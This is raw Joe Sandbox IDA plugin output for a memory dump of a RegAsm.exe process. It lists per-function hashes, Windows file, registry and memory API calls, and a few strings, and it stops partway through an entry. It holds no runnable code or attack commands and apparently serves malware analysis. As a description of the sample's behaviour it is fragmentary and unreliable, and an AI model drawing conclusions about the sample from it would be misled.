• Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
• Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
• CloseHandle.KERNEL32(00000000), ref: 0040957A
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: File$??2@CloseCreateHandleReadSize
• String ID:
• API String ID: 1023896661-0
• Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
• Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
• Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
• Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNEL32(?), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
• Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
• Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
• Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
• Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
                                                                                                                                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcmpmemset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1065087418-0
                                                                                                                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1381354015-0
                                                                                                                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                                                                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                                  • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2154303073-0
                                                                                                                                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$PointerRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3154509469-0
                                                                                                                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
• Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
• Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
• Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
APIs
• FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: FileModuleName
• String ID:
• API String ID: 514040917-0
APIs
• ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
• FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3655998216-0
                                                                                                                                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1828521557-0
                                                                                                                                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
